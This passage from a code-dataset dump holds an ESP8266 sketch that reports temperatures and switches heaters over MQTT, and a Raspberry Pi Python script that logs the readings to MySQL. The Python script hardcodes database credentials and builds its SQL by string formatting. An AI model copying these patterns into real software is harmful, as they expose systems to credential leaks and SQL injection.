connect(void);\nvoid getTemps();\nvoid sendTeperature(float temp, int i);\nvoid controlHeaters(char *value);\n\n//setup\nvoid setup() {\n for (int i = 0; i < sizeof(Heater) - 1; i++) {\n pinMode(Heater[i], OUTPUT);\n }\n\n Serial.begin(115200);\n\n // Connect to WiFi access point.\n Serial.println(); Serial.println();\n delay(10);\n Serial.print(F(\"Connecting to \"));\n Serial.println(WLAN_SSID);\n\n WiFi.begin(WLAN_SSID, WLAN_PASS);\n while (WiFi.status() != WL_CONNECTED) {\n delay(500);\n Serial.print(F(\".\"));\n }\n Serial.println();\n\n Serial.println(F(\"WiFi connected\"));\n Serial.println(F(\"IP address: \"));\n Serial.println(WiFi.localIP());\n\n // listen for events on the feeds\n mqtt.subscribe(&heaters);\n\n // connect to adafruit io\n connect();\n\n}\n\n\n\n//main\nvoid loop() {\n Adafruit_MQTT_Subscribe *subscription;\n\n // ping adafruit io a few times to make sure we remain connected\n if (! mqtt.ping(3)) {\n // reconnect to adafruit io\n if (! 
mqtt.connected())\n connect();\n }\n\n // this is our 'wait for incoming subscription packets' busy subloop\n while (subscription = mqtt.readSubscription(1000)) {\n\n if (subscription == &heaters) {\n // convert mqtt ascii payload to int\n char *value = (char *)heaters.lastread;\n Serial.print(F(\"Received: \"));\n Serial.println(value);\n\n int i = value[1] - 48;\n if (i == 9) {\n getTemps();\n } else {\n controlHeaters(value);\n }\n }\n }\n}\n\n\n\nvoid getTemps() {\n float temp;\n for (int i = 0; i < NO_SENSORS; i++) {\n do {\n DS18B20.requestTemperatures();\n temp = DS18B20.getTempCByIndex(i);\n } while (temp == 85.0 || temp == (-127.0));\n sendTeperature(temp, i);\n }\n\n\n}\n\nvoid sendTeperature(float temp, int i) {\n Serial.print(\"Sensor \");\n Serial.print(i);\n Serial.print(\" Temperature: \");\n Serial.println(temp);\n String topic = \"sensor\";\n topic += i;\n char* result;\n //sprintf(result, \"%f\", temp);\n mqtt.publish(topic.c_str(), String(temp).c_str(), 0);\n\n}\n\nvoid controlHeaters(char *value) {\n int i = value[0] - 48;\n int current = value[1] - 48;\n\n // write the current state to the power switch tail\n digitalWrite(Heater[i], current == 1 ? HIGH : LOW);\n}\n\n// connect to Pi io via MQTT\nvoid connect() {\n\n Serial.print(F(\"Connecting to Pi... \"));\n\n int8_t ret;\n\n while ((ret = mqtt.connect()) != 0) {\n\n switch (ret) {\n case 1: Serial.println(F(\"Wrong protocol\")); break;\n case 2: Serial.println(F(\"ID rejected\")); break;\n case 3: Serial.println(F(\"Server unavail\")); break;\n case 4: Serial.println(F(\"Bad user/pass\")); break;\n case 5: Serial.println(F(\"Not authed\")); break;\n case 6: Serial.println(F(\"Failed to subscribe\")); break;\n default: Serial.println(F(\"Connection failed\")); break;\n }\n\n if (ret >= 0)\n mqtt.disconnect();\n\n Serial.println(F(\"Retrying connection...\"));\n delay(5000);\n\n }\n\n Serial.println(F(\"Pi Connected!\"));\n\n}\n"
},
{
"alpha_fraction": 0.6162790656089783,
"alphanum_fraction": 0.6339213848114014,
"avg_line_length": 30.8157901763916,
"blob_id": "9eeed3103c9a0aa24e368d0e92cfd10fbdfd5e42",
"content_id": "28a571653df6ab6a58c95598f8fdefb670a02f55",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2494,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 76,
"path": "/piserver.py",
"repo_name": "jdawson91/MQTT-esp8266",
"src_encoding": "UTF-8",
"text": "import paho.mqtt.client as mqtt\r\nimport time\r\nimport datetime\r\nimport MySQLdb\r\n\r\n########## MySQL Setup ##########\r\n# Open database connection\r\ndb = MySQLdb.connect('localhost','mqtt','raspberry','temperature' )\r\n\r\n# prepare a cursor object using cursor() method\r\ncursor = db.cursor()\r\n\r\n########## MQTT Setup ##########\r\n# The callback for when the client receives a CONNACK response from the server.\r\ndef on_connect(client, userdata, flags, rc):\r\n print(\"Connected with result code \"+str(rc))\r\n\r\n # Subscribing in on_connect() means that if we lose the connection and\r\n # reconnect then subscriptions will be renewed.\r\n client.subscribe(\"sensor0\")\r\n client.subscribe(\"sensor1\")\r\n client.subscribe(\"sensor2\")\r\n client.subscribe(\"sensor3\")\r\n\r\nclient = mqtt.Client()\r\nclient.on_connect = on_connect\r\n\r\nclient.connect(\"192.168.0.200\", 1883, 60)\r\n\r\n# Start looping the MQTT network interface in the background\r\nclient.loop_start()\r\n\r\n########## Main Code ##########\r\n\r\n# The callback for when a PUBLISH message is received from the server.\r\ndef on_message(client, userdata, msg):\r\n\r\n #get the name of this topic, this tells us which sensor we are dealing with\r\n csensor = msg.topic\r\n #get the payload, this is the temperature the sensor is reporting minus 2 as the sensors report a little high\r\n ctemp = float(msg.payload)-2\r\n #get the zone by taking the last character of the message topic. (topics will be \"sensor0\", \"sensor1\", etc\r\n zone = list(csensor)[6]\r\n print(csensor+\" %f\" % ctemp)\r\n\r\n # Prepare SQL query to INSERT a record into the database.\r\n sql =\"INSERT INTO temps(date, time, zone, temperature) VALUES (CURRENT_DATE(), NOW(), '%s', '%f')\" % (csensor, ctemp)\r\n try:\r\n # Execute the SQL command\r\n cursor.execute(sql)\r\n # Commit changes to database\r\n db.commit()\r\n print(\"success\")\r\n except MySQLdb.Error, e:\r\n try:\r\n print \"MySQL Error [%d]: %s\" % (e.args[0], e.args[1])\r\n except IndexError:\r\n print \"MySQL Error: %s\" % str(e)\r\n # Rollback if error\r\n db.rollback()\r\n #switch on heater if temp in zone is less then 20\r\n if ctemp <= 24:\r\n client.publish(\"HEATER_FEED\", zone+\"1\", 1)\r\n else:\r\n client.publish(\"HEATER_FEED\", zone+\"0\", 1)\r\n\r\n\r\nclient.on_message = on_message\r\n\r\n\r\n# Main loop\r\nwhile True:\r\n # send temperature request\r\n client.publish(\"HEATER_FEED\", \"99\", 1)\r\n # wait for 15 minutes\r\n time.sleep(15*60)\r\n"
}
] | 2 |
adobs/homework_customers_who_overpaid
|
https://github.com/adobs/homework_customers_who_overpaid
|
eadcc12ad4637e7c2d9ca8673d57aea862b5c598
|
be818d8b636d95747f7b31db286c0699c5e1859b
|
e76d62cbb24cdba992d7219b3f47acadbeb6cc80
|
refs/heads/master
| 2021-01-10T14:51:10.026423 | 2015-09-25T02:35:46 | 2015-09-25T02:35:46 | 43,105,218 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6583054661750793,
"alphanum_fraction": 0.6627647876739502,
"avg_line_length": 33.403846740722656,
"blob_id": "02cafb624a3e17c2bdb9f66aace962e876b55b6e",
"content_id": "147d07b28e3fd7508195982ea51fde55c2ce25bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1794,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 52,
"path": "/accounting_edited.py",
"repo_name": "adobs/homework_customers_who_overpaid",
"src_encoding": "UTF-8",
"text": "def customer_payment_recorder(path):\n \"\"\"\n takes an order file and returns the amount overpaid and underpaid\n\n\n \"\"\"\n record_log = open(path)\n\n customers_underpaid = {}\n customers_overpaid = {}\n customers_paid = []\n\n for entry in record_log:\n entry = entry.rstrip()\n entry = entry.split(\"|\")\n\n customer_name = entry[1]\n qty_melons_ordered = int(entry[2])\n price_paid = float(entry[3])\n price_of_melon = 1.00\n\n\n #define customers who overpaid, and underpaid\n if qty_melons_ordered*price_of_melon < price_paid:\n customers_overpaid[customer_name] = price_paid - price_of_melon*qty_melons_ordered \n elif qty_melons_ordered*price_of_melon > price_paid:\n customers_underpaid[customer_name] = price_of_melon*qty_melons_ordered -price_paid \n else:\n customers_paid.append(customer_name)\n\n #calculate amount overpaid, and undepaid\n overpaid_amount = sum(customers_overpaid.itervalues())\n underpaid_amount = sum(customers_underpaid.itervalues())\n\n #calculated number of customers who overpaid, and underpaid\n number_of_customers_underpay = len(customers_underpaid)\n number_of_customers_overpay = len(customers_overpaid)\n number_of_customers_correct = len(customers_paid)\n\n print \"CUSTOMERS OVERPAID\"\n print \"{} customers underpaid by ${:+.2f}\".format(number_of_customers_underpay,underpaid_amount)\n print\n print \"CUSTOMERS UNDERPAID\"\n print \"{} customers overpay by ${:+.2f}\".format(number_of_customers_overpay, overpaid_amount)\n print\n print \"CUSTOMERS PAID CORRECTLY\"\n print \"{} customers correctly paid\".format(number_of_customers_correct)\n \n\n\n\ncustomer_payment_recorder(\"customer-orders.txt\")\n\n\n\n\n\n"
}
] | 1 |
popart/pomodoro
|
https://github.com/popart/pomodoro
|
ecf31b46b2af5ca231415708569ba1771bf47cd5
|
8d1e829fd4e8effc27415c8009c81c639178bae8
|
69b6ab9e7e0569def06018ba32e40b41f41d3805
|
refs/heads/master
| 2020-04-02T03:15:40.201592 | 2016-07-05T15:53:24 | 2016-07-05T15:53:24 | 62,464,685 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6342779994010925,
"alphanum_fraction": 0.6383265852928162,
"avg_line_length": 27.5,
"blob_id": "86cd6cd00823a6e1134a445c01121357c2fd69eb",
"content_id": "a4f1b81b24475ef66cbcb8eadf19e8e6a6d11763",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 741,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 26,
"path": "/scripts/setup_db.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "import sqlite3\n\ndef run(conn, query):\n c = conn.cursor()\n c.execute(query)\n conn.commit()\n\ndef create_todos(conn):\n run(conn, '''CREATE TABLE todos\n (id integer primary key, uuid text,\n date_created timestamp DEFAULT CURRENT_TIMESTAMP)''')\n\ndef create_todo_tasks(conn):\n run(conn, '''CREATE TABLE todo_tasks (\n id integer primary key, todo_id integer,\n text text, pomodoros integer DEFAULT 0,\n completed boolean DEFAULT false,\n date_created timestamp DEFAULT CURRENT_TIMESTAMP,\n FOREIGN KEY (todo_id) REFERENCES todos(id)\n )''')\n\nif __name__ == \"__main__\":\n conn = sqlite3.connect('db/pomodoro.db')\n create_todos(conn)\n create_todo_tasks(conn)\n conn.close()\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.7008547186851501,
"avg_line_length": 23.63157844543457,
"blob_id": "852daebfb7a6e03f2dfe70988c1ea4a3a150fd7b",
"content_id": "750f00def45c345aca27c490e17b50b9b8f2b63e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 468,
"license_type": "no_license",
"max_line_length": 209,
"num_lines": 19,
"path": "/readme.md",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "# Pomodoro\nAn application to create todo lists and run a pomodoro timer. Uses [flask](http://flask.pocoo.org/), [cycle.js](http://cycle.js.org/), and [xstream](https://github.com/staltz/xstream). Written in Python & ES6.\n\n## Requirements\n * sqlite3\n * python3\n * python-virtualenv\n \n## Setup Instuctions\n ```bash\n npm install\n webpack\n\n virtualenv -p python3 venv\n source venv/bin/activate\n python scripts/setup_db.py\n pip install flask\n ./runserver\n ```\n"
},
{
"alpha_fraction": 0.4671781659126282,
"alphanum_fraction": 0.47058823704719543,
"avg_line_length": 24.478260040283203,
"blob_id": "ce897ec7cef18ff4b914ac67c6072606d448f27b",
"content_id": "7615565cde95c6077bee46ac6d63951eaa171586",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1173,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 46,
"path": "/store/todo_store.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "class TodoStore:\n\n def __init__(self, db):\n self.__db = db\n\n def insert(self, uuid):\n query = \"\"\"\n INSERT INTO todos (uuid)\n VALUES (?)\n \"\"\"\n self.__db.run(query, [uuid])\n\n def select(self, **params):\n search_params = []\n where_clause = \"\"\n\n if 'id' in params:\n search_params.append(params['id'])\n where_clause = where_clause + \"AND id = ?\"\n\n if 'uuid' in params:\n search_params.append(params['uuid'])\n where_clause = where_clause + \"AND uuid = ?\"\n\n if 'limit' in params: search_params.append(params['limit'])\n else:\n search_params.append(10)\n\n query = \"\"\"\n SELECT id, uuid, date_created FROM todos\n WHERE 1=1\n %s\n LIMIT ?\n \"\"\" % where_clause\n\n results = self.__db.fetch(query, search_params)\n\n def parse_result(result):\n id, uuid, date_created = result\n return {\n 'id': id,\n 'uuid': uuid,\n 'date_created': date_created\n }\n\n return map(parse_result, results)\n\n"
},
{
"alpha_fraction": 0.5438202023506165,
"alphanum_fraction": 0.550561785697937,
"avg_line_length": 22.421052932739258,
"blob_id": "5d2c3bb1c148fe1c7b5c741e5268dcbd0c577bad",
"content_id": "1cf7ef5e2dafbb2f53c23a16900a9ccae4568d9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 445,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 19,
"path": "/store/sqliteconn.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "import sqlite3\n\nclass SQLite3Conn:\n\n def __init__(self, db_loc):\n self.__conn = sqlite3.connect(db_loc)\n\n def run(self, query, params):\n c = self.__conn.cursor()\n c.execute(query, params)\n self.__conn.commit()\n\n def fetch(self, query, params):\n c = self.__conn.cursor()\n return c.execute(query, params).fetchall()\n\n def __del__(self):\n if self.__conn:\n self.__conn.close()\n"
},
{
"alpha_fraction": 0.6410014033317566,
"alphanum_fraction": 0.6461974382400513,
"avg_line_length": 28.40277862548828,
"blob_id": "7ea1a9345b4ac0f89f32f9dec3e4630e1718d748",
"content_id": "aac15d89bad04f9be8c6a3e54416daaf6dba4de2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2117,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 72,
"path": "/main.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "from flask import Flask, jsonify, redirect, url_for, request\nimport json\nfrom uuid import uuid4\nfrom store.sqliteconn import SQLite3Conn\nfrom store.todo_store import TodoStore\nfrom store.task_store import TaskStore\n\napp = Flask(__name__)\ndb = SQLite3Conn('db/pomodoro.db')\n\nstores = {\n 'todos': TodoStore(db),\n 'tasks': TaskStore(db)\n}\n\[email protected]('/')\[email protected]('/todo')\ndef landing():\n return app.send_static_file('index.html')\n\[email protected]('/api/todo/<uuid:uuid>')\ndef get_todo(uuid):\n todo = stores['todos'].select(uuid=str(uuid), limit=1)\n return jsonify({'resp': next(todo) })\n\[email protected]('/api/todo/new')\ndef create_todo():\n uuid = str(uuid4())\n stores['todos'].insert(uuid)\n return jsonify({'resp': uuid})\n\[email protected]('/api/todo/<uuid:uuid>/tasks')\ndef get_tasks(uuid):\n tasks = list(stores['tasks'].select(todo_uuid=str(uuid)))\n return jsonify({'resp': tasks})\n\[email protected]('/api/todo/<uuid:uuid>/tasks/new', methods=['POST'])\ndef create_task(uuid):\n data = json.loads(request.data.decode('utf-8'))\n todo = next(stores['todos'].select(\n uuid=str(uuid), limit=1))\n\n stores['tasks'].insert(data['text'], todo['id'])\n\n tasks = list(stores['tasks'].select(todo_id=todo['id']));\n return jsonify({ 'resp': tasks })\n\[email protected]('/api/todo/<uuid:uuid>/tasks/<task_id>/update', methods=['POST'])\ndef update_task(uuid, task_id):\n data = json.loads(request.data.decode('utf-8'))\n todo = next(stores['todos'].select(\n uuid=str(uuid), limit=1))\n\n stores['tasks'].update(task_id=task_id, **data)\n\n tasks = list(stores['tasks'].select(todo_id=todo['id']));\n return jsonify({ 'resp': tasks })\n\[email protected]('/api/tasks/<task_id>/addPomodoro')\ndef add_pomodoro(task_id):\n task = next(stores['tasks'].select(id=task_id))\n todo = next(stores['todos'].select(\n id=task['todo_id'], limit=1))\n\n stores['tasks'].update(task_id=task_id, add_pomodoros=1)\n\n tasks = list(stores['tasks'].select(todo_id=todo['id']));\n return jsonify({ 'resp': tasks })\n\[email protected]('/<path:path>')\ndef static_proxy(path):\n return app.send_static_file(path)\n"
},
{
"alpha_fraction": 0.7377777695655823,
"alphanum_fraction": 0.7644444704055786,
"avg_line_length": 19.454545974731445,
"blob_id": "a1df6b460588c0dec587498d07521687f445c54d",
"content_id": "ff51dc57a0636ba2efbe33504d5ab7f52a9b3346",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Dockerfile",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 11,
"path": "/docker/Dockerfile",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "FROM pritunl/archlinux\n\nRUN pacman -S --noconfirm python3\nRUN pacman -S --noconfirm python-pip\nRUN pacman -S --noconfirm npm\nRUN pacman -S --noconfirm sqlite3\nRUN pacman -S --noconfirm vim\n\nRUN pip install flask\n\nEXPOSE 5000\n"
},
{
"alpha_fraction": 0.578199028968811,
"alphanum_fraction": 0.5906936526298523,
"avg_line_length": 24.505495071411133,
"blob_id": "bd7d339cff4e9d264f4737584202f6b646861815",
"content_id": "c3c1512f1ec47482f085ad85aa0849116f273113",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 2321,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 91,
"path": "/static/src/components/timer.js",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "import xs from 'xstream';\nimport {div, h1, button, input} from '@cycle/dom';\n\nconst freeze = Object.freeze;\n\nclass TimerProps {\n constructor(startTime, time, paused) {\n this.startTime = startTime;\n this.time = time;\n this.paused = paused;\n }\n}\n\nconst timerPropsInit = freeze(new TimerProps(25 * 60, 25 * 60, false));\n\nfunction updateTimer(timerProps, timerEvent) {\n switch (timerEvent.caseClass) {\n case \"SET\":\n return freeze(new TimerProps(timerEvent.time,\n timerEvent.time, true));\n case \"RESET\":\n return freeze(new TimerProps(timerProps.startTime,\n timerProps.startTime, timerProps.paused));\n case \"TICK\":\n return freeze(new TimerProps(timerProps.startTime,\n timerProps.paused ?\n timerProps.time :\n Math.max(-1, timerProps.time - 1),\n timerProps.paused));\n case \"PAUSE\":\n return freeze(new TimerProps(timerProps.startTime,\n timerProps.time, !timerProps.paused));\n default:\n return timerProps;\n }\n}\n\nexport default function Timer(sources) {\n //intent\n const setTime$ = sources.DOM.select('#startTime').events('input')\n .map (ev => ({\n caseClass: \"SET\",\n time: Math.floor(ev.target.value * 60)\n }));\n\n const reset$ = sources.DOM.select('#reset').events('click')\n .mapTo({\n caseClass: \"RESET\"\n });\n\n const pause$ = sources.DOM.select('#pause').events('click')\n .mapTo({\n caseClass: \"PAUSE\"\n });\n\n const tick$ = xs.merge(reset$, setTime$, pause$).startWith(1)\n .map( () =>\n xs.periodic(1000)\n .mapTo( {\n caseClass: \"TICK\"\n })\n )\n .flatten();\n\n // model\n const timer$ = xs.merge(setTime$, reset$, pause$, tick$)\n .fold(updateTimer, timerPropsInit);\n\n // view\n const timerDOM$ = timer$.map(timerProps => {\n const time = Math.max(timerProps.time, 0)\n const minutes = Math.floor(time / 60);\n const seconds = ('00' + (time % 60)).slice(-2);\n return div([\n h1('#time', minutes + ':' + seconds),\n button('#reset', 'Reset'),\n button('#pause', timerProps.paused ? 'Start' : 'Pause'),\n input('#startTime', {\n attrs: {\n type: 'text',\n value: Math.floor(timerProps.startTime / 60)\n }\n })\n ])\n });\n\n return {\n DOM: timerDOM$,\n timerProps: timer$\n }\n}\n"
},
{
"alpha_fraction": 0.4925970435142517,
"alphanum_fraction": 0.4933973550796509,
"avg_line_length": 29.839506149291992,
"blob_id": "9cbd5298995a856acfca56d722ce5190ad687e4c",
"content_id": "196f9827c8dcef0c926476af1a0a1e6430d70012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2499,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 81,
"path": "/store/task_store.py",
"repo_name": "popart/pomodoro",
"src_encoding": "UTF-8",
"text": "class TaskStore:\n\n def __init__(self, db):\n self.__db = db\n\n def insert(self, text, todo_id):\n query = \"\"\"\n INSERT INTO todo_tasks (text, todo_id)\n VALUES (?, ?)\n \"\"\"\n self.__db.run(query, [text, todo_id])\n\n def select(self, **params):\n search_params = []\n join_clause = \"\"\n where_clause = \"\"\n limit_clause = \"\"\n\n if 'todo_id' in params:\n search_params.append(params['todo_id'])\n where_clause = where_clause + \"AND tt.todo_id = ?\\n\"\n\n if 'todo_uuid' in params:\n search_params.append(params['todo_uuid'])\n join_clause = join_clause + \"JOIN todos t ON t.id = tt.todo_id\\n\"\n where_clause = where_clause + \"AND t.uuid = ?\\n\"\n\n if 'id' in params:\n search_params.append(params['id'])\n where_clause = where_clause + \"AND tt.id = ?\\n\"\n\n if 'limit' in params:\n limit_clause = \"LIMIT ?\\n\"\n search_params.append(params['limit'])\n\n query = \"\"\"\n SELECT tt.id, tt.todo_id, tt.text, tt.pomodoros, tt.completed,\n tt.date_created\n FROM todo_tasks tt\n %s\n WHERE 1=1\n %s\n %s\n ORDER BY tt.date_created\n \"\"\" % (join_clause, where_clause, limit_clause)\n\n def parse_result(result):\n id, todo_id, text, pomodoros, completed, date_created = result\n return {\n 'id': id,\n 'todo_id': todo_id,\n 'text': text,\n 'pomodoros': pomodoros,\n 'completed': True if completed == 'true' else False,\n 'date_created': date_created\n }\n\n results = self.__db.fetch(query, search_params)\n return map(parse_result, results)\n\n def update(self, **params):\n update_clause = \"\"\n search_params = []\n\n if 'completed' in params:\n update_clause = update_clause + \"completed = ?\\n\"\n search_params.append(str(params['completed']).lower())\n if 'add_pomodoros' in params:\n update_clause = update_clause + \"pomodoros = pomodoros + ?\\n\"\n search_params.append(params['add_pomodoros'])\n\n search_params.append(params['task_id'])\n\n query = \"\"\"\n UPDATE todo_tasks SET\n %s\n WHERE\n ID = ?\n \"\"\" % update_clause\n\n self.__db.run(query, search_params)\n\n"
}
] | 8 |
Charlie-23/Titanic
|
https://github.com/Charlie-23/Titanic
|
8adcc21d3e837039fe60da57e1f4b822db457a87
|
a813c1a4b657a93ca1d4e788ad6080fc289354a4
|
7f60ac613d9009caceb0b59b76378f29ff46f63b
|
refs/heads/master
| 2020-05-26T22:03:00.666108 | 2019-05-25T19:22:36 | 2019-05-25T19:22:36 | 188,391,439 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6239978671073914,
"alphanum_fraction": 0.6488508582115173,
"avg_line_length": 23.20270347595215,
"blob_id": "e330198fdfd889112da4609626fd415f1ff2409a",
"content_id": "512489c4d821925ab1f31b68b873ece247a3bb18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3742,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 148,
"path": "/SOLUTION.py",
"repo_name": "Charlie-23/Titanic",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 25 18:35:54 2019\r\n\r\n@author: Prakash\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\n# Importing the dataset_traain_set\r\ndataset_t = pd.read_csv('test.csv')\r\ndataset_t.drop([\"PassengerId\",\"Name\",\"Ticket\",\"Cabin\"],axis = 1,inplace = True)\r\n\r\n#imputing missing values_train\r\ndataset_t.info()\r\n\r\ndataset_t.iloc[152,5]=dataset_t.iloc[:,5].mean()\r\nfare_t = dataset_t.iloc[:, [0,5]].values\r\nage_t = dataset_t.iloc[:, 2].values\r\n\r\nfare_test_t = []\r\nindices_t=[]\r\nfor i_t in range(0,len(age_t)):\r\n if (np.isnan(age_t[i_t])):\r\n fare_test_t.append(fare_t[i_t])\r\n indices_t.append(i_t)\r\n \r\n else:\r\n continue\r\n \r\nfare_t = np.delete(fare_t,indices_t,axis = 0) \r\nage_t = np.delete(age_t,indices_t,axis = None) \r\n\r\n\r\nfare_test_t = np.array(fare_test_t)\r\nfare_test_t = fare_test_t.reshape(-1,2)\r\n\r\n\r\n\r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor_t = LinearRegression()\r\nregressor_t.fit(fare_t,age_t)\r\n\r\nage_pred_t = regressor_t.predict(fare_test_t)\r\nj=0\r\nfor i in range(0,418):\r\n if (np.isnan(dataset_t.iloc[i,2])):\r\n dataset_t.iloc[i,2]=age_pred_t[j]\r\n j=j+1\r\n#Dropping unnecessary features \r\n#Final_data_to_train_system\r\ndataset_t.info()\r\nI_t= dataset_t.iloc[:,[0,1,2,3,4,5,6]].values\r\n#categorical_feature_processing_train\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_I_t = LabelEncoder()\r\nI_t[:, 1] = labelencoder_I_t.fit_transform(I_t[:, 1])\r\n\r\n\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_I_t1 = LabelEncoder()\r\nI_t[:, 6] = labelencoder_I_t1.fit_transform(I_t[:, 6])\r\nonehotencoder = OneHotEncoder(categorical_features = [1,6])\r\nI_t = onehotencoder.fit_transform(I_t).toarray()\r\n\r\n\r\n\r\n# Importing the dataset_train_set\r\ndataset = pd.read_csv('train.csv')\r\n\r\n#Dropping unnecessary features \r\ndataset.drop([\"PassengerId\",\"Name\",\"Ticket\",\"Cabin\"],axis = 1,inplace = True)\r\ncommon_value = 'S'\r\ndataset['Embarked'] = dataset['Embarked'].fillna(common_value)\r\n\r\n#imputing missing values_train\r\nfare = dataset.iloc[:, [1,6]].values\r\nage = dataset.iloc[:, 3].values\r\nfare_test = []\r\nindices=[]\r\nfor i in range(0,len(age)):\r\n if (np.isnan(age[i])):\r\n fare_test.append(fare[i])\r\n indices.append(i)\r\n \r\n else:\r\n continue\r\n \r\nfare = np.delete(fare,indices,axis = 0) \r\nage = np.delete(age,indices,axis = None) \r\n\r\nfare_test = np.array(fare_test)\r\nfare_test = fare_test.reshape(-1,2)\r\n\r\n\r\n \r\n\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(fare, age)\r\n\r\nage_pred = regressor.predict(fare_test)\r\nj=0\r\nfor i in range(0,891):\r\n if (np.isnan(dataset.iloc[i,3])):\r\n dataset.iloc[i,3]=age_pred[j]\r\n j=j+1\r\n \r\n else:\r\n continue\r\n\r\n\r\ndataset.info()\r\n#Final_data_to_train_system\r\nO= dataset.iloc[:,0].values\r\nI= dataset.iloc[:,[1,2,3,4,5,6,7]].values\r\n#categorical_feature_processing_train\r\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\r\nlabelencoder_I = LabelEncoder()\r\nI[:, 1] = labelencoder_I.fit_transform(I[:, 1])\r\n\r\nlabelencoder_I1 = LabelEncoder()\r\nI[:, 6] = labelencoder_I1.fit_transform(I[:, 6])\r\n\r\nonehotencoder = OneHotEncoder(categorical_features = [1,6])\r\nI = onehotencoder.fit_transform(I).toarray()\r\n\r\n\r\n\r\nfrom sklearn.ensemble import 
RandomForestClassifier\r\n\r\nrandom_forest = RandomForestClassifier(n_estimators=100)\r\nrandom_forest.fit(I,O)\r\n\r\nY_predictiont1 = random_forest.predict(I_t)\r\ndataset_1t = pd.read_csv('test.csv')\r\nx=dataset_1t.iloc[:,0]\r\n\r\ndf = pd.DataFrame(x)\r\nl=[]\r\nfor i in range(0,418):\r\n l.append(Y_predictiont1[i])\r\n \r\ndf['Survived']=l\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
}
] | 1 |
NikV/my-first-python
|
https://github.com/NikV/my-first-python
|
c8d85eb8e997b680775a1f22fc0acbf9eabd70f6
|
3d75fc4c1b837ed090121dc94b4162ee075060de
|
76a635ae51c7b81b1df02eeda7741f336bf3a299
|
refs/heads/master
| 2021-03-19T07:09:23.082224 | 2015-04-22T03:19:49 | 2015-04-22T03:19:49 | 34,068,164 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6508620977401733,
"alphanum_fraction": 0.681034505367279,
"avg_line_length": 21,
"blob_id": "9ba486978ce724a458b660c9fb820d82172bd269",
"content_id": "06c9567b3945f46c60a8572e6805c2ffb13cf775",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 464,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 21,
"path": "/cool.py",
"repo_name": "NikV/my-first-python",
"src_encoding": "UTF-8",
"text": "import platform\nimport calendar\nimport time;\n\n\nraw_input(\"\\n\\nPress the enter key to continue.\")\nprint platform.machine()\nprint platform.version()\nticks = time.time()\nprint \"Number of ticks since 12:00am, January 1, 1970:\", ticks\ncal = calandar.month(2015, 1)\nprint cal;\n\nstr = raw_input(\"Are you cool? \");\n\nwords = str.split() #split the sentence into individual words\n\nif str in ['y', 'Y', 'yes', 'Yes', 'YES']:\n print(\"Cool!\")\nelse:\n print(\"TROLOLOLO\")\n\n\n"
},
{
"alpha_fraction": 0.7631579041481018,
"alphanum_fraction": 0.7631579041481018,
"avg_line_length": 56,
"blob_id": "cb28818994759842234425fc2e38059831b57427",
"content_id": "a63ab5f705b83a85367280f9f407b28570275700",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 114,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 2,
"path": "/README.md",
"repo_name": "NikV/my-first-python",
"src_encoding": "UTF-8",
"text": "# My First Python\nWriting my first simple Python script. Probably have a lot more coming in the future...maybe...\n"
}
] | 2 |
stronglily/lhy
|
https://github.com/stronglily/lhy
|
f60b31edbea034f6b75da97008eee85bc547860a
|
4e9dcfd4bc023c580db3addfe1a744a5fa32e02e
|
c0e5e1c78751949316f0c3847bc14a2d5a264286
|
refs/heads/master
